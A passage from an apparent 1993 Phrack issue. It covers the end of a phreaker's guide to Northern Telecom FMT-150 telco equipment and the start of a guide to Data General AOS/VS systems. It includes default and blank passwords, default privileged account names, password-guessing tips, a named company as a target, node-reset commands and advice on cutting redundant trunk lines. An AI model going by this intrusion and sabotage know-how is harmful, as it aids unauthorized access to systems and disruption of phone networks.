  9798.                    Enter Terminal Type:
  9799.  
  9800. Choose your terminal type, usually 2 (use VT100) if you are calling in,
  9801. and it will prompt you with a "Login: " prompt, this is a trick, there
  9802. are no user levels, the "Login:" simply means enter the password, and
  9803. the default is to hit return, so always try that first.  If a password
  9804. is installed then try something like FMT-150 or something that you would
  9805. think they would use.  You should get a screen like this one after
  9806. choosing the terminal type:
  9807.  
  9808.  
  9809.                    FMT-150 Transmission System
  9810.  
  9811.                          Northern Telecom
  9812.  
  9813.  
  9814.  
  9815.  
  9816.  
  9817.                Firmware Copyright Northern Telecom 1988
  9818.  
  9819.  
  9820. - - Node Id.:  123456789012345- - - - Last Update 87/03/06 11:07-
  9821. Login:  (remember, enter a password here, no user levels!)
  9822.  
  9823. - - Syst Id.:  123456789012345- - - - Time:  87/03/06  11:07- - -
  9824.  
  9825.  
  9826.  
  9827.  
  9828. After Logging In
  9829.  
  9830. (commands are presented in an outline configuration, you should
  9831. be getting screens of output, but this outline will show you what
  9832. to input.  # = number, not pound, <sp> = spacebar.)
  9833.  
  9834. Example:  If I wanted to set the system's date to 1/4/1943 (heh)
  9835.           then after logging in I would press, "c" then "d", then
  9836.           "43", then "1" and finally "4".
  9837.  
  9838.  
  9839. -----------------------------------------------------------------
  9840. a                        Alarms (once again, lame stuff)
  9841.      o                        Optical Tx/Rx unit-level alarm
  9842.                                 screen.
  9843.      t                        Translator module-level alarm
  9844.                                 screen.
  9845.      m                        DM-13 multiplexer-level alarm
  9846.                                 screen.
  9847.      c                        Common equipment-level and customer
  9848.                                 input/output points alarm screen.
  9849.  
  9850. c                        Configuration (!)
  9851.      a                        alarm logger
  9852.        e                        enable alarm logger
  9853.        d                        disable alarm logger
  9854.      i
  9855.        # <sp>  "name"           Name a customer input point
  9856.         o
  9857.        # <sp>  "name"           Name a customer output point
  9858.      d
  9859.        #1 <sp> #2 <sp> #3 <sp>  Set date: #1 is year, #2 is month
  9860.                                 #3 is day.
  9861.      t
  9862.        #1 <sp> #2 <sp> #3 <sp>  Set time: #1 is hour, #2 is
  9863.                                 minute.
  9864.      p
  9865.        "oldpass"     "newpass"  Change password from "oldpass" to
  9866.                                   "newpass".
  9867.      s
  9868.        "system ID name"         Name System ID
  9869.  
  9870. s                        Switching commands (extremely extensive,
  9871.                            so I will include a small portion)
  9872.      # <sp>
  9873.        m
  9874.          # <sp>
  9875.            <return>                 Display DM-13 Switch Screen
  9876.        t
  9877.          <return>                 Display translator/optics
  9878.                                     switch status for node #.
  9879.      <return>                 Display translator/optics switch
  9880.                                 status for local node or node last
  9881.                                 displayed.
  9882. m                        Maintenance Commands
  9883.      r (see note)
  9884.        *                        Reset all nodes
  9885.        # <sp>                   Reset node #
  9886.      t
  9887.        # <sp>
  9888.          o                        Operate test of customer
  9889.                                     input/output points and E2A
  9890.                                     ports.
  9891.          r                        Release test of customer
  9892.                                     input/output points and E2A
  9893.                                     ports.
  9894.      l                            Logout of the FMT-150 system.
  9895.  
  9896. n                        Network Status
  9897.      <return>                 Display network status screen.
  9898.  
  9899.  
  9900. NOTE: After executing a local or global MCU reset, the message
  9901. "PROCESSOR CRASH" will appear on the bottom of the CRT's screen.
  9902. As a result, the user will have to log back into the system.  In
  9903. addition, a global MCU reset will clear all "names" and
  9904. "settings" previously defined (that is, system ID, node, customer
  9905. inputs/outputs, time and date).
  9906.  
  9907. -----------------------------------------------------------------
  9908.  
  9909.  
  9910. Many other commands are listed but they are extremely numerous
  9911. and useless to the average phreak.
  9912.  
  9913. If a "terminal" that is 4.4 inches tall with a center screen and
  9914. 2 12 key keypads on either side is seen on the shelf, this will
  9915. be a CAMMS terminal, all functions above can be performed with
  9916. this unit, its menu driven.
  9917.  
  9918.  
  9919. Troubleshooting
  9920.  
  9921.  
  9922. This section is the manual is devoted to fixing problems in the
  9923. FMT-150, aimed at the average see-my-crack-of-the-ass telco
  9924. maintenance man.
  9925.  
  9926. Basically, if you see any red LEDs, inspect them and judge if you
  9927. should get the hell out of the CO or not, usually red LEDs mean
  9928. trouble.
  9929.  
  9930.  
  9931. REDUNDANCY
  9932.  
  9933. When doing anything of this nature to a fone company, you must
  9934. remember, they are not stupid, everything has something to
  9935. fall back on, if you were to cut a trunk line, there would be
  9936. another to take its place.  Usually there will be only one
  9937. backup, so be meticulous and find both.
  9938.  
  9939.  
  9940. Outro
  9941.  
  9942.  
  9943. Hope this file was worth something to somebody, it applies mostly
  9944. to those in a GTE area, since GTE uses Northern Telecom equipment
  9945. and most everyone else uses AT&T stuff.
  9946.  
  9947.  
  9948.                                             -FyberLyte 9-93
  9949.                               ==Phrack Magazine==
  9950.  
  9951.                  Volume Four, Issue Forty-Four, File 14 of 27
  9952.  
  9953. ()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
  9954.  
  9955.                  A Guide to Data General Corporation's
  9956.  
  9957.                              AOS/VS System
  9958.                                  PART I
  9959.  
  9960.                              by Herd Beast
  9961.  
  9962.  
  9963. INTRODUCTION
  9964. ~~~~~~~~~~~
  9965.  
  9966. This file is a full (as full as such a file can get) guide to the AOS/VS
  9967. system.  The main reason for writing it is that from what I've seen,
  9968. there is practically no info (in the form of files or otherwise) about
  9969. it.  I won't say I'm the only one who knows anything about it, but I had
  9970. a hell of a time getting any sort of help when I started hacking these
  9971. systems (I didn't get that help, in case you were wondering, and wrote
  9972. this file all by myself 'cause I'm a MAN!  Hahaha! <snort> <snort>).
  9973.  
  9974. I will explain a little about AOS/VS and then explain some of the
  9975. commands and security features in it.  This file is not a buffer of any
  9976. help facility, although much information can and will be found in the
  9977. help facility.
  9978.  
  9979. I can be contacted (hopefully) at hbeast@mindvox.phantom.com.  If you
  9980. want a nice start, and a front page on Newsweek, some Texaco ("Star of
  9981. the American Road") systems run AOS/VS.
  9982.  
  9983. I cannot, will not, and do not assume liability for ANY of the effects
  9984. of the use of this file.  Also, I cannot guarantee that EVERYTHING will
  9985. work EVERYWHERE, so treat this file as a reference.  This file by no
  9986. means covers everything about AOS/VS.
  9987.  
  9988. IDENTIFYING THE SYSTEM
  9989. ~~~~~~~~~~~~~~~~~~~~~
  9990.  
  9991. Should you just fall at the system prompt, you might mistake it for a
  9992. VMS.  However, blank prompts like that are rare.  An AOS/VS will
  9993. identify itself like this: (this and all other buffered info in this
  9994. file are from an AOS/VS II with CLI32.  Only the best for Phrack)
  9995.  
  9996. AOS/VS II 2.20.00.12 / EXEC-32 2.20.00.07       31-May-93 22:51:25      @CON177
  9997.  
  9998. Username:
  9999. Password:
  10000.  
  10001. Another thing different will be the incorrect login message:
  10002.  
  10003. Invalid username - password pair
  10004.  
  10005. The header line lists the system version, current time/date and the console
  10006. you are using.
  10007.  
  10008. When you reach the maximum incorrect logins defined in the system, it
  10009. will show the line below and disconnect:
  10010.  
  10011. Too many attempts, console locking for 10 seconds
  10012.  
  10013. When you do succeed to log on, the system will display:
  10014.  
  10015. ------
  10016.         Copyright (C) Data General Corporation, 1980 - 1992
  10017.         All rights reserved.
  10018.         Licensed material -- property of Data General Corporation
  10019.         This software is made available solely pursuant to the
  10020.         terms of a DGC license agreement which governs its use.
  10021.  
  10022. ((NOTE: Or something else.  This is the default))
  10023. --------
  10024. Most recent logon        1-Jan-93       10:10:01
  10025.  
  10026. Very clear.  Before you do anything, type CHARACTERISTICS.  You will
  10027. then get output like this:
  10028.  
  10029. /605X/LPP=24/CPL=80/BREAK=BMOB/TCC=40000/TCD=5000/TDW=1000/THC=2000/TLT=2000
  10030. /ON/ST/EB0/ULC/WRP/CTD
  10031. /OFF/SFF/EPI/8BT/SPO/RAF/RAT/RAC/NAS/OTT/EOL/UCO/MRI/FF/EB1/PM/NRM/MOD/TO/TSP/
  10032. C/FKT/VAL/HOFC/SHR/OFC/IFC/16B/ACC/SRDS/XLT/AUTOBAUD/CALLOUT/MDUA/HDPX/SMCD/RT
  10033. D/HIFC/G1G0/DKHW/NLX
  10034.  
  10035. Look for "/NAS".  It stands for non ANSI standard, which means that if
  10036. you are using ANSI (probably you are), you needs to issue
  10037. CHARACTERISTICS/OFF/NAS, should you find "/NAS" listed after "/ON".
  10038.  
  10039. Upon logging off from the system (BYE), you will see:
  10040.  
  10041. AOS/VS II  CLI   Terminating     1-JAN-93       11:11:01
  10042. Process 180 Terminated
  10043. Elapsed Time   0:16:26, CPU Time   0:00:02.447, I/O Blocks  281
  10044. (Other console jobs, same USERNAME --  16)
  10045. User 'HBT' logged off @CON228   1-Jan-93       11:11:01
  10046.  
  10047. SYSTEM DEFAULTS
  10048. ~~~~~~~~~~~~~~
  10049.  
  10050. These are accounts I usually found existing.  As usual, they are really
  10051. similar to those of any other system.
  10052.  
  10053. USERNAME
  10054. --------
  10055. ((Privileged accounts))
  10056. OP                                 EXEC default username
  10057. SYSMGR                             System manager
  10058. CEO_MGR                            If the system is running CEO
  10059. OPER
  10060. OPERATOR
  10061. ((Regular accounts))
  10062. CEO.xxxxx                          If the system is running CEO, a CEO
  10063.                                    user, xxxxx being his number.
  10064.  
  10065. As for password guessing, well, it's all been said.  Try the username,
  10066. with some modification, you might get in.  As dumb as it sounds, yes,
  10067. people do have weak passwords, even today, although not everywhere.
  10068.  
  10069. SYSTEM STRUCTURE
  10070. ~~~~~~~~~~~~~~~
  10071.  
  10072. In this section I'll try to describe the real basics of AOS/VS.  I will
  10073. describe a few commands HERE, and not under "Command List", these
  10074. commands will be the basic commands: change directory, list files, etc,
  10075. needed to survive in any system.
  10076.  
  10077. The AOS "shell" is called CLI (Command Line Interpreter).  There are
  10078. two versions of CLI, CLI16 and CLI32, with CLI32 being more advanced.
  10079. The CLI version affects the system prompt, the way commands are handled
  10080. by the system and by the user, and more.  For example, some command
  10081. switches do not exist under CLI16 (unless very important, I omitted
  10082. switches that work only under CLI32 from this file).
  10083.  
  10084. Here are the privilege levels available under AOS/VS:
  10085.  
  10086.           CLI16 PROMPT   CLI32 PROMPT  PRIVILEGES MODES
  10087.           -------------+--------------+--------------------------
  10088.           )              )             None
  10089.                          Sm)           System Manager
  10090.           +)             Sp)           Superprocess
  10091.           *)             Su)           Superuser
  10092.                          SmSp)         System Manager and Superprocess
  10093.                          SmSu)         System Manager and Superuser
  10094.           #)             SpSu)         Superprocess and Superuser
  10095.                          SmSpSu)       System Manager, Superprocess, Superuser
  10096.  
  10097. AOS/VS doesn't grant privileges upon logon.  A user's profile may state
  10098. the user can access privilege level So-And-So, and if the user later
  10099. needs that level, he calls upon a SUPER utility to grant him that
  10100. level.  This is the place to explain how several different utilities
  10101. work.  OPERATOR grants the user the ability to access diskettes in dump
  10102. or load sessions (see the section titled "System Commands") in sequential
  10103. order, instead of accessing them one by one.  SUPERUSER turns off all
  10104. access checking, enabling the user to do anything with any file on the
  10105. system.  SUPERPROCESS gives the user the ability to terminate, block,
  10106. unblock, or change priorities of any process on the system.  The last
  10107. command, PRIVILEGE, which is available only under CLI32, enables the user
  10108. to set both SUPERUSER and SUPERPROCESS access.  It also offers the only
  10109. way to set SYSTEMMANAGER access, which is required for operations like
  10110. changing time or date.
  10111.  
  10112. Command are executed by calling their names, or any part of their name
  10113. that only fits them.  For example, SUPERUSER can be abbreviated as
  10114. SUPERU.  It is important to remember that command switches MUST follow
  10115. the command without any space, or else the command will try to process
  10116. the switches!  For example, CHARACTERISTICS /OFF/NAS will result in an
  10117. "Error: Illegal filename character characteristics,/off/nas".
  10118.  
  10119. The root directory directory is called ':'.  Any other directories are
  10120. under it, for example ':OUT' and ':OUT:RALF'.  If, for example, you FTP
  10121. into an AOS/VS and use "cd /" you will be moved in ':'.  If you use "cd
  10122. /out/ralf" you will be moved into ':OUT:RALF'.  To make this much more
  10123. clearer (right):
  10124.  
  10125.                                    :
  10126.                                   HBT
  10127.                                    |
  10128.                                    |
  10129.                                   TEXT
  10130.                                   /  \
  10131.                              PHRACK  SEX
  10132.  
  10133. Legal characters in file or directory names are all the alphabet and
  10134. numbers, plus '$', '_', '.' and '?'.
  10135.  
  10136. Moving from directory to directory is done by using the "DIRECTORY"
  10137. command.  Without any arguments, DIRECTORY shows the current path.  With
  10138. an argument, DIRECTORY changes to that directory.
  10139.  
  10140. DIRECTORY [directory]
  10141. ---------------------
  10142.  
  10143. /I        Changes to the initial directory
  10144. /I path   Changes the initial directory to "path"
  10145. /P        Changes to the previous directory
  10146.  
  10147. To list files in a directory, use "FILESTATUS".  Without arguments,
  10148. FILESTATUS lists files in the current directory.  With a path argument,
  10149. FILESTATUS lists file in that path.
  10150.  
  10151. FILESTATUS [directory]
  10152. ----------------------
  10153.  
  10154. /[AFTER|BEFORE]/[TCR|TLA|TLM]=date and/or time
  10155.  
  10156.           Shows files matching the selection date or time.  The
  10157.           selections are: time created (TCR); time last accessed (TLA);
  10158.           and time last modified (TLM).  The difference between accessed
  10159.           and modified is pretty clear, for example if the file is an
  10160.           executable.  The date/time format is: for TIME - hour-minute-sec
  10161.           (xx-xx-xx); for DATE - day-month-year (xx-xxx-xx); for BOTH -
  10162.           dd-mmm-yy:hh:mm:ss.  Example command lines will be
  10163.  
  10164.           FILESTATUS/AFTER/TCR=11             Created after 11 AM
  10165.           FILESTATUS/BEFORE/TLM=01-JAN-90     Modified before 01/01 1990
  10166.           FILESTATUS/AFTER/TLA=01-JAN-90:11   Accessed after 11 AM,
  10167.                                               01/01, 1990
  10168.  
  10169. /ASSORTMENT
  10170.  
  10171.           Normally, FILESTATUS output is just file name.  With
  10172.           /ASSORTMENT, FILESTATUS shows file type, time/date of
  10173.           creation, and length in bytes.  Similar to Unix, if the file
  10174.           is a link, the file type is set to LNK and FILESTATUS shows
  10175.           its path.
  10176.  
  10177. /COUNT    Tells how many files are in the directory.   [CLI32]
  10178.  
  10179. /[DCR|DLA|DLM]
  10180.  
  10181.           Shows date of creation (DCR); date last accessed (DLA); and
  10182.           date last modified (DLM).
  10183.  
  10184. /LENGTH   Displays file length in bytes.
  10185.  
  10186. /LINKNAME
  10187.  
  10188.           If the file is a link, FILESTATUS displays the information
  10189.           about the file that it's linked too.  For example, if BOB is
  10190.           linked to RON, FILESTATUS/LINKNAME BOB would display RON's
  10191.           details.  Otherwise, nothing happens.
  10192.  
  10193. /TYPE=[\]type
  10194.  
  10195.           Displays files of type, or all files not of that type (if
  10196.           \type) was used.  See below for valid file types.
  10197.  
  10198. /UDA      If the file has a UDA (user data area), its presence is displayed.
  10199.  
  10200. The CLI's wildcards (sort of), are '=', '^', ':' and '@.  '=' means the
  10201. current directory.  '^' means the parent directory.  ':' is (as already
  10202. said) the root directory.  '@' means the devices directory (where
  10203. consoles, tape drives, modems, etc are.  Similar to /dev on Unix).  Note
  10204. that when talking about directories, the ':' is already included.  For
  10205. example, if you're in :UDD:HBT:TEXT, and want to move to :UDD:HBT:BIN,
  10206. you'd type DIRECTORY ^BIN, and not DIRECTORY ^:BIN.  File wildcards are
  10207. '+', which is equivalent to '*' at DOS, and '#' which is equivalent to
  10208. '*.*' at DOS.  For example, FILE +.CLI will show all the files whose
  10209. names end with ".CLI"; FILE :UDD:# will display all the files in UDD
  10210. (which won't happen if you just issue FILE :UDD -- in that case, you'll
  10211. see only information about the directory UDD, and not the files within
  10212. it).
  10213.  
  10214. As with Unix, you can enter more than one command on a line if you
  10215. separate the commands with a ';' (a semicolon).  If you need more than a
  10216. line for your commands, type an '&' before pressing Return, and the CLI
  10217. will just keep on reading, instead of processing the command line and
  10218. try to run it.  This goes ONLY for a sequence like this: "&<Return>", an
  10219. '&' anywhere else acts just like any other character.
  10220.  
  10221. There are several control characters the CLI takes and uses:
  10222.  
  10223.                  CONTROL CHAR               WHAT IT DOES
  10224.                  ------------------+-------------------------------
  10225.                  Ctrl-C              Begins a Ctrl char sequence.
  10226.  
  10227.                  Ctrl-D              End of file.
  10228.  
  10229.                  Ctrl-L              Clear screen.
  10230.  
  10231.                  Ctrl-P              Don't interpret the following
  10232.                                      character in any special way.
  10233.  
  10234.                  Ctrl-S              Stops output to the terminal.
  10235.  
  10236.                  Ctrl-Q              Resumes output to the terminal.
  10237.  
  10238.                  Ctrl-U              Cancel (delete) current input line.
  10239.  
  10240.                  Ctrl-C Ctrl-A       Interrupt current process.
  10241.  
  10242.                  Ctrl-C Ctrl-B       Terminates current process.
  10243.  
  10244.                  Ctrl-C Ctrl-C       Empties the input buffer.
  10245.  
  10246.                  Ctrl-C Ctrl-E       Terminates current process and
  10247.                                      create a break file (where
  10248.                                      termination message is stored).
  10249.  
  10250. If the CLI is run with a /NOCA switch, it will ignore Ctrl-C Ctrl-A
  10251. sequences, so if put in the start of a macro file, it won't allow you to
  10252. break that macro and enter the CLI.
  10253.  
  10254. AOS/VS had many file types.  File types are three letter acronyms
  10255. (although not always) for the file; the same way DOS and VMS have
  10256. extensions, the file type controls what the file is (it can have any
  10257. extension in its name).  File types have a decimal numbers assigned to
  10258. them, as well.  There are 70 file types, although the operating
  10259. system reserves space for 128.  The user can define his own file types.
  10260. These are some of the he AOS/VS file types:
  10261.  
  10262.                      TYPE NUMBER     TYPECODE       MEANING
  10263.                     -------------+------------+-----------------
  10264. All these types  /      11        LDU        Logical disk unit
  10265. are directories -|      12        CPD        Control point directory
  10266.                  \      10        DIR        Directory
  10267.                          0        LNK        Link
  10268.                         68        TXT        Text
  10269.                          1        SDF        System data file
  10270.                          2        MTF        Magnetic tape file
  10271.                         13        MTV        Magnetic tape volume
  10272.                         22        MTU        Magnetic tape unit
  10273.                         49        CON        Console
  10274.                         51        RMA        Remote host (RMA)
  10275.                         52        HST        Remote host (X.25 SVC)
  10276.                         54        PVC        Remote host (X.25 PVC)
  10277.                         64        UDF        User data file
  10278.                         69        LOG        System log file
  10279.                         74        PRV        AOS/VS program file
  10280.                         75        WRD        Word processing file
  10281.                         87        UNX        Unix file (created on a Unix)
  10282.                         95        SPD        Spreadsheet file
  10283.                        104        PIP        Pipe
  10284.                        105        TTX        Teletex file
  10285.  
  10286.  
  10287. "Generic files" are actually pointers that help using devices and files.
  10288. For example, the @NULL generic file functions like /dev/null on Unix.
  10289. Here are the generic files:
  10290.  
  10291.      @CONSOLE       The process' (user's) console.
  10292.  
  10293.      @DATA          A long file created by the user that will be used as
  10294.                     data by a program.  @DATA is set using DATAFILE.
  10295.  
  10296.      @INPUT         A short file created by the user that will be used
  10297.                     as input by a program.  @INPUT is set using
  10298.                     PROCESS/INPUT=.
  10299.  
  10300.      @NULL          Well, null.
  10301.  
  10302.      @LIST          A long output file that will be used as a program's
  10303.                     output.  @LIST is set using LISTFILE.
  10304.  
  10305.      @OUTPUT        A short output file for a program.  @OUTPUT is set
  10306.                     using PROCESS/OUTPUT=.
  10307.  
  10308. When a program is run, it will sometime try to open one of these generic
  10309. files.  If they're not set, it will fail on error 21 (non existent
  10310. file).  But if the file is set, it can use it.  So, for example, you can
  10311. use PROCESS/OUTPUT=@CONSOLE PROGRAM for output to go to you, or
  10312. PROCESS/OUTPUT=OUT_FILE PROGRAM for it to go to OUT_FILE.
  10313.  
  10314. "Device files" are files the connect to hardware parts, such as modems,
  10315. printers, tapes, diskette drives, FAX machines, etc.  In due time, a
  10316. program called EXEC makes a connection between processes and devices and
  10317. utilizes those devices (see the section titled "The 'EXEC' Program").
  10318. Some devices are also used by the backup related programs DUMP and LOAD,
  10319. and more.  Some of these are:
  10320.  
  10321.      @MTB0:x        The magnetic tape unit #0, x being a dumpfile on the
  10322.                     tape (x starts from 0).
  10323.  
  10324.      @DPJ           A diskette device name.
  10325.  
  10326.      @LFD           A generic labeled diskette file name.
  10327.  
  10328.  
  10329. The equivalent of a PATH (usually environment variable) in other systems
  10330. is called SEARCHLIST in AOS/VS.  When you call a command, or ask for
  10331. help, the CLI looks through your SEARCHLIST for the files.  So, assuming
  10332. you typed HELP MODEM, and somewhere in your searchlist there exists a
  10333. file called MODEM.CLI, HELP will show you,
  10334. modem           - Macro, File :UTIL:COMM:MODEM.CLI
  10335. The same goes for other commands, even TYPE (TYPE MODEM.CLI from
  10336. :UDD:HBT, if :UTIL:COMM is in your searchlist and there's no MODEM.CLI
  10337. in :UDD:HBT will work).
  10338.  
  10339. To display your searchlist, just use plain SEARCHLIST.  To change it,
  10340. use SEARCHLIST path,path,path ...
  10341.  
  10342. It's possible to set a password for your current CLI session.  This
  10343. password is not the password used upon login!  It's a password the user
  10344. sets to protect his session.  He then types LOCK, and from then, anyone
  10345. wishing to use the user's CLI (from the user's console), must enter the
  10346. password first.  Legal passwords are up to 32 characters long, not
  10347. including Ctrl characters.
  10348.  
  10349. The CLI offers several levels to the user.  It starts on the highest
  10350. level, 0, and the user may create other level, and use POP to move up a
  10351. level, and PUSH to go down a level.  When a user POPs to a level,
  10352. the CLI environment of the older (higher) level remains (the environment
  10353. of the level he was in until that time is therefore changed).  When he
  10354. PUSHes, the current level's environment is copied to the lower level.
  10355. To display the current CLI level, use LEVEL.  To display the level's
  10356. environment, use CURRENT.  To display an upper level's environment
  10357. (except when at the highest level), use PREVIOUS.
  10358.  
  10359. When you want to print a file, or run something in the background, you
  10360. have to submit it as a job.  The submit a printing job, use the QPRINT
  10361. command (will print the file).  To submit a batch job, which is for
  10362. executing a command, use QBATCH (for example, QBATCH MASM ASMPROG).
  10363.  
  10364. AOS/VS had a facility called "queues", managed by the EXEC program (see
  10365. "The 'EXEC' Program").  A queue is a place where file transfer, batch,
  10366. and printing jobs are stored until the right process can take them and
  10367. execute them.  The standard queues are:
  10368.  
  10369.           QUEUE NAME       JOB TYPE                 CONTENTS
  10370.           --------------+------------+----------------------------------
  10371.           BATCH_INPUT        Batch       Batch input files.
  10372.                                          Submitted by QBATCH or QSUBMIT.
  10373.  
  10374.           BATCH_OUTPUT       Printing    Output files from finished
  10375.                                          batch jobs (usually sent to a
  10376.                                          line printer).
  10377.  
  10378.           BATCH_LIST         Printing    List files from finished batch
  10379.                                          jobs (usually sent to a line
  10380.                                          printer).
  10381.  
  10382.               ((Batch jobs are submitted through QBATCH.))
  10383.  
  10384.           LPT                Printing    Print jobs submitted by QSUBMIT.
  10385.  
  10386.           MOUNTQ             Mount       Tape mount requests.
  10387.                                          Submitted by MOUNT.
  10388.  
  10389. After a job has been submitted, use QDISPLAY to show its status.  Use
  10390. QHOLD to hold jobs and QUNHOLD to release them.  Last, to display the
  10391. status of all queues, use QDISPLAY as well.
  10392.  
  10393. AOS/VS also has an extensive help facility.  For help on broad topics,
  10394. use HELP (to list topics) and then HELP *TOPIC.  For help on system
  10395. commands, use HELP COMMAND (for a list of switches) or HELP/V COMMAND for
  10396. more details.
  10397.  
  10398. CLI MACRO PROGRAMMING
  10399. ~~~~~~~~~~~~~~~~~~~~
  10400.  
  10401. Macro filenames usually end with ".CLI" are usually text files (filetype
  10402. TXT).  A macro is a file that will be executed when called (adding .CLI
  10403. to the name when calling isn't necessary), and perform the commands (or
  10404. other macros) in it.  If the macro matches the name of a CLI command,
  10405. the macro must be called together with the .CLI part of its name.  Macros
  10406. expand arguments in the following way:
  10407.  
  10408. Range Arguments (like filenames):
  10409.  
  10410. %x%       Argument number x, with its switches.  %0% is the macro's
  10411.           name.
  10412. %-%       All the arguments, with their switches, except for %0%.
  10413. %x-y,i%   Arguments x through y, in jumps of i.  If x or i are missing,
  10414.           the CLI assumes 1.  If y is omitted, 32767 is assumed.  For
  10415.           example, if the arguments were "1 2 3 4 5 6 7", a %2-6,2% call
  10416.           expands to "2 4 6".
  10417.  
  10418. Switch Arguments:
  10419.  
  10420. %x/%      All the switches of argument x.
  10421. %x\%      Argument x, without its switches.
  10422. %x/y%     Argument x, with switch number y.
  10423. %x/y=%    The value of argument's x switch number y.
  10424. %x\y%     All the switches of argument x, including their values, except
  10425.           for switch number y.
  10426.  
  10427. Conditionals are used in the form of [CONDITIONAL,ARGS].  If a
  10428. conditional returns TRUE, the CLI executes everything after it until it
  10429. reaches an ELSE or an END.  Otherwise, it skips to an ELSE or an END
  10430. (basic programming).
  10431.  
  10432. !EQUAL    True if both arguments equal alphabetically.
  10433. !NEQUAL   True if both arguments don't equal alphabetically.
  10434. !UEQ      True if both arguments equal numerically.
  10435.  
  10436. These are called pseudo macros, and are usually built like conditionals,
  10437. although sometimes they just substitute for a part of the environment.
  10438. There are about 60 of them, but I'll only list a selected few for
  10439. brevity.
  10440.  
  10441. [!ACL path]         Expands for the ACL of path.
  10442. [!ASCII octnum]     Expands to the ASCII character with the octnum octal
  10443.                     number.  For example, newline is octal 12.
  10444. [!CLI]              Expands to CLI32 or CLI16, according to the CLI.
  10445. [!DATE]             Date, like 01-Jan-93.
  10446. [!SYSTEM]           Expands to the type of OS.
  10447. [!SEARCHLIST]       Expands to the search list.
  10448. [!LEVEL]            Expands to the current CLI level.
  10449. [!CLI]              Expands to the CLI type.
  10450. [!EXPLODE args]     Puts a comma between each pair of character in args.
  10451.                     When used with STRING, in converts spaces and tabs
  10452.                     too.  When used with WRITE, in converts into space.
  10453. [!LISTFILE]         Expands to the path of the listfile.
  10454. [!USERNAME]         Expands to the username of the person running the
  10455.                     macro.
  10456. [!LOGON]            Returns CONSOLE if logged on to a terminal or BATCH
  10457.                     if logged in on a batch stream (only works for EXEC
  10458.                     logons).
  10459. [!DATAFILE]         Expands to the path of the datafile.
  10460. [!HID [host]]       Returns the host ID.  With [host] return the host ID
  10461.                     of [host].
  10462. [!HOST [host]]      Returns the host name.
  10463. [!STRING]           Expands to the value of the CLI string.
  10464.  
  10465. A more complex pseudo macro is !READ:
  10466. [!READ[/args] text]
  10467.  
  10468. !READ prints text to the output and then expands to what was received
  10469. from the input (which is considered finished when a newline is
  10470. received).  !READ's args are functional only under CLI32 and are:
  10471.  
  10472. /EOF=str
  10473.  
  10474.           The string that will be returned if EOF is met.
  10475.  
  10476. /FILEID=file
  10477.  
  10478.           Reads from file instead of @OUTPUT.  The file must be already
  10479.           opened using OPEN.
  10480.  
  10481. /LENGTH=x
  10482.  
  10483.           Read until x characters were typed.
  10484.  
  10485. /S
  10486.  
  10487.           Discards all typed after a semicolon (';') or a left bracket
  10488.           ('[').  Otherwise, that text must be a valid CLI command or
  10489.           macro, or a pseudo macro or macro ending with a right bracket
  10490.           if following the left bracket.
  10491.  
  10492. Note that all pseudo macros, including !READ can be used at the command
  10493. line and not just in CLI macro files.
  10494.  
  10495.  
  10496. Here's an example:
  10497.  
  10498. COMMENT -------------------------------------------------
  10499. COMMENT Examples of the use of conditionals and arguments
  10500. COMMENT in macros.
  10501. COMMENT This macro was invoked like this:
  10502. COMMENT HMAC 9 0 000
  10503. COMMENT -------------------------------------------------
  10504.  
  10505. [!EQUAL,%1%,]
  10506.      WRITE,,,,Execute with arguments please!
  10507. [!ELSE]
  10508.      [!EQUAL,%2%,%3%]
  10509.           WRITE,,,,%2% and %3% do match ALPHABETICALLY.
  10510.      [!ELSE]
  10511.           WRITE,,,,%2% and %3% don't match ALPHABETICALLY.
  10512.      [!END]
  10513.      [!UEQ,%2%,%3]
  10514.           WRITE,,,,%2% and %3% do match NUMERICALLY.
  10515.      [!ELSE]
  10516.           WRITE,,,,%2% and %3% don't match ALPHABETICALLY.
  10517.      [!END]
  10518.      [!UEQ,%1%,%2%]
  10519.           WRITE,,,,%1% and %2% do match NUMERICALLY.
  10520.      [!ELSE]
  10521.           WRITE,,,,%1% and %2% don't match NUMERICALLY.
  10522.      [!END]
  10523. [!END]
  10524.  
  10525. COMMENT -------------------------------------------------
  10526. COMMENT The output would be:
  10527. COMMENT 0 and 000 don't match ALPHABETICALLY.
  10528. COMMENT 0 and 000 do match NUMERICALLY.
  10529. COMMENT 9 and 0 don't math NUMERICALLY.
  10530. COMMENT -------------------------------------------------
  10531.  
  10532. [!EQUAL,[!READ What's your name?,,],HBT]
  10533.      WRITE,,,,[!ASCII 12]You're HBT.
  10534. [!ELSE]
  10535.      WRITE,,,,[!ASCII 12]You're not HBT.
  10536. [!END]
  10537.  
  10538. [!EQUAL,[!CLI],CLI16]
  10539.      WRITE,,,,[!ASCII 12]I was going to show you something else.
  10540.      WRITE,,,,Too bad you're using CLI16 which won't let READ take arguments.
  10541. [!ELSE]
  10542.      STRING [!READ/LENGTH=1 Continue? (Y/N)]
  10543.      [!EQUAL,[!STRING],N]
  10544.           WRITE,,,,[!ASCII 12]Good man [!USERNAME].
  10545.      [!ELSE]
  10546.           [!EQUAL,[!STRING],Y]
  10547.                WRITE,,,,[!ASCII 12]Too bad Mister I-Use-[!SYSTEM]
  10548.           [!ELSE]
  10549.                WRITE,,,,[!ASCII 12]Learn English guy.
  10550.           [!END]
  10551.      [!END]
  10552. [!END]
  10553. WRITE,,,,Thank you for using %0%.
  10554.  
  10555. AOS/VS can also be programmed in 16 bit and 32 bit Assembly (and
  10556. compiled using MASM), BASIC, Fortran, C, Pascal and probably others.
  10557.  
  10558. This second program is actually quite simple.  I do not even read the
  10559. UPF type file directly; I just feed text into the PREDITOR (see the next
  10560. section).
  10561.  
  10562. COMMENT -------------------------------------------------
  10563. COMMENT Delete the little help screen if you are under
  10564. COMMENT CLI16.  Or just run CLI32.
  10565. COMMENT -------------------------------------------------
  10566.  
  10567. [!EQUAL,%1%,]
  10568.      WRITE,,,,[!ASCII 12]Format is: %0%/A NAME
  10569.      WRITE,,,,,,,,,,,,or      /L NAME
  10570. [!ELSE]
  10571.      [!EQUAL,%1%,]
  10572.                WRITE,,,,,,,Which user exactly?
  10573.      [!ELSE]
  10574.           [!NEQUAL,%0/L%,]
  10575.                WRITE/L=?USER.TMP  L
  10576.                WRITE/L=?USER.TMP  %1%
  10577.                WRITE/L=?USER.TMP
  10578.                WRITE/L=?USER.TMP  b
  10579.                PROC/DEF/IOC/IN=?USER.TMP/BLOCK PREDITOR
  10580.                DEL ?USER.TMP
  10581.           [!ELSE]
  10582.                WRITE/L=?USER.TMP  c
  10583.                WRITE/L=?USER.TMP  %1%
